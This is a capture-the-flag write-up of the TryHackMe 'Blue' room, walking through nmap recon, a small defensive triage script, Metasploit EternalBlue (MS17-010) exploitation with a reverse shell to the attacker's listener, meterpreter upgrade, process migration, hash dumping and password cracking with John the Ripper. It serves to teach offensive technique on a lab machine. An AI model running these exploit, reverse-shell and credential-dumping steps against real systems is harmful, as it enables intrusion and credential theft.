TryHackMe: Blue Writeup

Writeup and notes for the Blue room on TryHackMe.

Task 1: Recon

How many ports are open with a port number under 1000?

nmap -Pn -p 0-1000 10.10.235.14
┌──(kali㉿kali)-[~/Documents/TryHackMe/Blue]
└─$ nmap -Pn -p 0-1000 10.10.235.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-13 08:41 EDT
Nmap scan report for 10.10.235.14
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds

The answer is 3.

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

nmap -A 10.10.235.14
┌──(kali㉿kali)-[~/Documents/TryHackMe/Blue]
└─$ nmap -A 10.10.235.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-13 08:47 EDT
Nmap scan report for 10.10.235.14
Host is up (0.19s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2024-03-13T12:50:26+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2024-03-12T12:38:34
|_Not valid after:  2024-09-11T12:38:34
|_ssl-date: 2024-03-13T12:50:31+00:00; -1s from scanner time.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:98:24:56:55:e9 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-03-13T07:50:26-05:00
| smb2-time: 
|   date: 2024-03-13T12:50:26
|_  start_date: 2024-03-13T12:38:33
|_clock-skew: mean: 59m59s, deviation: 2h14m10s, median: -1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.61 seconds

From the nmap scan above, the target's OS is Windows 7 and the product version is 6.1.7601.

Searching for that product version led to MS17-010 (the EternalBlue exploit).
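The scan output above carries everything a defender needs to triage this host before anyone reaches for an exploit: the open SMB and RDP ports, the Windows 7 SP1 banner, and the two signing lines (SMBv1 signing disabled, SMBv2 signing not required). As an added example that is not part of the original writeup, the script below parses a trimmed copy of that nmap text (embedded as a constructed sample) and turns those fields into findings. The finding strings and the `parse_nmap`/`assess` function names are my own choices, not nmap's.

```python
import re

# Constructed sample: a trimmed copy of the nmap -A output shown in the writeup.
SAMPLE_NMAP = """\
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Product_Version: 6.1.7601
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)", re.M)


def parse_nmap(text):
    """Pull the fields a triage script cares about out of nmap's normal output."""
    report = {
        "open_ports": {int(p): svc for p, svc in PORT_RE.findall(text)},
        "os": None,
        "smb1_signing": None,
        "smb2_signing": None,
    }
    m = re.search(r"^\|\s+OS:\s+(.+)$", text, re.M)      # smb-os-discovery "OS:" line
    if m:
        report["os"] = m.group(1).strip()
    m = re.search(r"message_signing:\s+(\w+)", text)     # SMBv1 signing state
    if m:
        report["smb1_signing"] = m.group(1)
    m = re.search(r"Message signing (enabled but not required|enabled and required|disabled)", text)
    if m:
        report["smb2_signing"] = m.group(1)               # SMBv2 signing state
    return report


def assess(report):
    """Map the parsed fields to plain-language findings for a hardening ticket."""
    findings = []
    ports = report["open_ports"]
    if 445 in ports:
        findings.append("SMB exposed on 445/tcp")
    if report["os"] and "Windows 7" in report["os"]:
        findings.append("Windows 7 host: end of support, confirm MS17-010 patch state")
    if report["smb1_signing"] == "disabled":
        findings.append("SMB1 message signing disabled")
    if report["smb2_signing"] == "enabled but not required":
        findings.append("SMB2 signing not required")
    if 3389 in ports:
        findings.append("RDP exposed on 3389/tcp")
    return findings


if __name__ == "__main__":
    for line in assess(parse_nmap(SAMPLE_NMAP)):
        print("-", line)
```

Run against a saved `nmap -A` output (`nmap -A -oN scan.txt ...`) instead of the embedded sample to triage a real host; the same five findings come out for the Blue box.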

Task 2: Gain Access

Start Metasploit. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

msfconsole
search MS17-010
msf6 > search MS17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

The answer is exploit/windows/smb/ms17_010_eternalblue.

Show options and set the one required value. What is the name of this value? (All caps for submission)

use 0
show options
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

The answer is RHOSTS.

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter: set payload windows/x64/shell/reverse_tcp With that done, run the exploit!

If you are reaching the target from your own machine over OpenVPN, LHOST must be set to the IP address assigned to the tun0 interface. Without this the shell to the target never came up.

To find the IP address assigned to tun0, run the ifconfig command or browse to http://10.10.10.10/.

To open a shell on the target with the EternalBlue exploit, start Metasploit and enter the following commands.

search MS17-010
use 0
set payload windows/x64/shell/reverse_tcp
set rhosts <target IP>
set lhost <your tun0 IP>
exploit

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.9.221.71:4444 
[*] 10.10.69.132:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.69.132:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.69.132:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.69.132:445 - The target is vulnerable.
[*] 10.10.69.132:445 - Connecting to target for exploitation.
[+] 10.10.69.132:445 - Connection established for exploitation.
[+] 10.10.69.132:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.69.132:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.69.132:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.69.132:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.69.132:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.69.132:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.69.132:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.69.132:445 - Sending all but last fragment of exploit packet
[*] 10.10.69.132:445 - Starting non-paged pool grooming
[+] 10.10.69.132:445 - Sending SMBv2 buffers
[+] 10.10.69.132:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.69.132:445 - Sending final SMBv2 buffers.
[*] 10.10.69.132:445 - Sending last fragment of exploit packet!
[*] 10.10.69.132:445 - Receiving response from exploit packet
[+] 10.10.69.132:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.69.132:445 - Sending egg to corrupted connection.
[*] 10.10.69.132:445 - Triggering free of corrupted buffer.
[-] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.69.132:445 - Connecting to target for exploitation.
[+] 10.10.69.132:445 - Connection established for exploitation.
[+] 10.10.69.132:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.69.132:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.69.132:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.69.132:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.69.132:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.69.132:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.69.132:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.69.132:445 - Sending all but last fragment of exploit packet
[*] 10.10.69.132:445 - Starting non-paged pool grooming
[+] 10.10.69.132:445 - Sending SMBv2 buffers
[+] 10.10.69.132:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.69.132:445 - Sending final SMBv2 buffers.
[*] 10.10.69.132:445 - Sending last fragment of exploit packet!
[*] 10.10.69.132:445 - Receiving response from exploit packet
[+] 10.10.69.132:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.69.132:445 - Sending egg to corrupted connection.
[*] 10.10.69.132:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.69.132
[*] Command shell session 1 opened (10.9.221.71:4444 -> 10.10.69.132:49169) at 2024-03-16 08:56:18 -0400
[+] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
          

C:\Windows\system32>whoami
whoami
nt authority\system

If the shell does not come up on the first try, run the exploit command again or reboot the target VM.

Task 3: Escalate

If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

search shell_to_meterpreter
msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade


Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

The answer is post/multi/manage/shell_to_meterpreter.

Reference

Select this (use MODULE_PATH). Show options, what option are we required to change?

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connec
                                       tion
   LHOST                     no        IP of host that will receive the connection from the
                                        payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on

The answer is SESSION.

Set the required option, you may need to list all of the sessions to find your target here.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type               Information                    Connection
  --  ----  ----               -----------                    ----------
  1         shell x64/windows  Shell Banner: Microsoft Windo  10.10.50.80:4444 -> 10.10.136
                               ws [Version 6.1.7601] -----    .150:49176 (10.10.136.150)

msf6 post(multi/manage/shell_to_meterpreter) > 
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > 

Run! If this doesn't work, try completing the exploit from the previous task once more.

msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.50.80:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 10.10.136.150
[*] Meterpreter session 2 opened (10.10.50.80:4433 -> 10.10.136.150:49192) at 2024-03-15 12:21:10 +0000
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         shell x64/windows        Shell Banner: Microsoft Wi  10.10.50.80:4444 -> 10.10.
                                     ndows [Version 6.1.7601] -  136.150:49176 (10.10.136.1
                                     ----                        50)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-  10.10.50.80:4433 -> 10.10.
                                     PC                          136.150:49192 (10.10.136.1
                                                                 50)

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
[-] Already running as SYSTEM

List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

meterpreter > ps

Process List
============

 PID   PPID  Name            Arch  Session  User                    Path
 ---   ----  ----            ----  -------  ----                    ----
 0     0     [System Proces
             s]
 4     0     System          x64   0
 416   4     smss.exe        x64   0        NT AUTHORITY\SYSTEM     \SystemRoot\System32\sm
                                                                    ss.exe
 428   712   svchost.exe     x64   0        NT AUTHORITY\SYSTEM
 488   712   svchost.exe     x64   0        NT AUTHORITY\SYSTEM
 564   556   csrss.exe       x64   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\csr
                                                                    ss.exe
 612   556   wininit.exe     x64   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\win
                                                                    init.exe
 624   604   csrss.exe       x64   1        NT AUTHORITY\SYSTEM     C:\Windows\system32\csr
                                                                    ss.exe
 664   604   winlogon.exe    x64   1        NT AUTHORITY\SYSTEM     C:\Windows\system32\win
                                                                    logon.exe
 712   612   services.exe    x64   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\ser
                                                                    vices.exe
 720   612   lsass.exe       x64   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\lsa
                                                                    ss.exe
 728   612   lsm.exe         x64   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\lsm
                                                                    .exe
 800   564   conhost.exe     x64   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\con
                                                                    host.exe
 836   712   svchost.exe     x64   0        NT AUTHORITY\SYSTEM
 904   712   svchost.exe     x64   0        NT AUTHORITY\NETWORK S
                                            ERVICE
 952   712   svchost.exe     x64   0        NT AUTHORITY\LOCAL SER
                                            VICE
 1020  664   LogonUI.exe     x64   1        NT AUTHORITY\SYSTEM     C:\Windows\system32\Log
                                                                    onUI.exe
 1080  712   svchost.exe     x64   0        NT AUTHORITY\LOCAL SER
                                            VICE
 1164  712   svchost.exe     x64   0        NT AUTHORITY\NETWORK S
                                            ERVICE
 1312  712   spoolsv.exe     x64   0        NT AUTHORITY\SYSTEM     C:\Windows\System32\spo
                                                                    olsv.exe
 1348  712   svchost.exe     x64   0        NT AUTHORITY\LOCAL SER
                                            VICE
 1408  712   TrustedInstall  x64   0        NT AUTHORITY\SYSTEM
             er.exe
 1412  712   amazon-ssm-age  x64   0        NT AUTHORITY\SYSTEM     C:\Program Files\Amazon
             nt.exe                                                 \SSM\amazon-ssm-agent.e
                                                                    xe
 1488  712   LiteAgent.exe   x64   0        NT AUTHORITY\SYSTEM     C:\Program Files\Amazon
                                                                    \XenTools\LiteAgent.exe
 1648  712   Ec2Config.exe   x64   0        NT AUTHORITY\SYSTEM     C:\Program Files\Amazon
                                                                    \Ec2ConfigService\Ec2Co
                                                                    nfig.exe
 1916  3048  powershell.exe  x64   0        NT AUTHORITY\SYSTEM     C:\Windows\System32\Win
                                                                    dowsPowerShell\v1.0\pow
                                                                    ershell.exe
 1960  712   svchost.exe     x64   0        NT AUTHORITY\NETWORK S
                                            ERVICE
 2172  836   WmiPrvSE.exe
 2424  712   svchost.exe     x64   0        NT AUTHORITY\LOCAL SER
                                            VICE
 2548  712   svchost.exe     x64   0        NT AUTHORITY\SYSTEM
 2560  712   sppsvc.exe      x64   0        NT AUTHORITY\NETWORK S
                                            ERVICE
 2628  712   vds.exe         x64   0        NT AUTHORITY\SYSTEM
 2776  712   SearchIndexer.  x64   0        NT AUTHORITY\SYSTEM
             exe
 2868  564   conhost.exe     x64   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\con
                                                                    host.exe
 2924  1312  cmd.exe         x64   0        NT AUTHORITY\SYSTEM     C:\Windows\System32\cmd
                                                                    .exe

meterpreter > 

Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

From the process list above, amazon-ssm-agent.exe (PID 1412) was chosen.

meterpreter > migrate 1412
[*] Migrating from 1916 to 1412...
[*] Migration completed successfully.
meterpreter > 

Task 4: Cracking

Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter > 

The answer is Jon.

Copy this password hash to a file and research how to crack it. What is the cracked password?

Save the dumped hashes to a file.

$ cat hash.txt 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Next, run John the Ripper with no options other than --wordlist.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

It then said to use the --format=NT option.

┌──(kali㉿kali)-[~/Documents/TryHackMe/Blue]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/kali/.john
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 1 password hash (LM [DES 128/128 AVX])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)     
1g 0:00:00:00 DONE (2024-03-15 08:44) 50.00g/s 1228Kp/s 1228Kc/s 1228KC/s 123456..010986
Warning: passwords printed above might not be all those cracked
Use the "--show --format=LM" options to display all of the cracked passwords reliably
Session completed. 

Running John the Ripper again with the --format=NT option cracked the password.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
┌──(kali㉿kali)-[~/Documents/TryHackMe/Blue]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)     
alqfna22         (Jon)     
2g 0:00:00:00 DONE (2024-03-15 08:46) 3.448g/s 17586Kp/s 17586Kc/s 17595KC/s alqui..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. 

The answer is alqfna22.

Task 5: Find flags!

Flag1? This flag can be found at the system root.

Since the flag is said to be at the system root, take a look at C:\.

meterpreter > dir "C:"
Listing: C:
===========

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  0      dir   2018-12-13 03:13:36 +0000  $Recycle.Bin
040777/rwxrwxrwx  0      dir   2009-07-14 06:08:56 +0100  Documents and Settings
040777/rwxrwxrwx  0      dir   2009-07-14 04:20:08 +0100  PerfLogs
040555/r-xr-xr-x  4096   dir   2019-03-17 22:22:01 +0000  Program Files
040555/r-xr-xr-x  4096   dir   2019-03-17 22:28:38 +0000  Program Files (x86)
040777/rwxrwxrwx  4096   dir   2019-03-17 22:35:57 +0000  ProgramData
040777/rwxrwxrwx  0      dir   2018-12-13 03:13:22 +0000  Recovery
040777/rwxrwxrwx  4096   dir   2024-03-15 12:41:37 +0000  System Volume Information
040555/r-xr-xr-x  4096   dir   2018-12-13 03:13:28 +0000  Users
040777/rwxrwxrwx  16384  dir   2019-03-17 22:36:30 +0000  Windows
100666/rw-rw-rw-  24     fil   2019-03-17 19:27:21 +0000  flag1.txt
000000/---------  0      fif   1970-01-01 01:00:00 +0100  hiberfil.sys
000000/---------  0      fif   1970-01-01 01:00:00 +0100  pagefile.sys

flag1.txt was found; it contains the flag.

meterpreter > cat "C:\flag1.txt"
flag{access_the_<REDACTED>}

Flag2? This flag can be found at the location where passwords are stored within Windows.

*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare, however, it can happen.

C:\Windows\System32\Config\flag2.txt was found; it contains the flag.

meterpreter > dir "C:\Windows\System32\Config\flag2.txt"
100666/rw-rw-rw-  34  fil  2019-03-17 19:32:48 +0000  C:\Windows\System32\Config\flag2.txt
meterpreter > cat "C:\Windows\System32\Config\flag2.txt"
flag{sam_database_<REDACTED>}

flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Exit the meterpreter shell and, at the Windows command prompt, search for a file named flag3.txt with the following command.

dir "\flag3.txt" /s
C:\Windows\system32>dir "\flag3.txt" /s
dir "\flag3.txt" /s
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Jon\Documents

03/17/2019  02:26 PM                37 flag3.txt
               1 File(s)             37 bytes

     Total Files Listed:
               1 File(s)             37 bytes
               0 Dir(s)  21,064,400,896 bytes free

C:\Users\Jon\Documents\flag3.txt was found; it contains the flag.

C:\Windows\system32>type C:\Users\Jon\Documents\flag3.txt
type C:\Users\Jon\Documents\flag3.txt
flag{admin_documents_can_be_valuable}
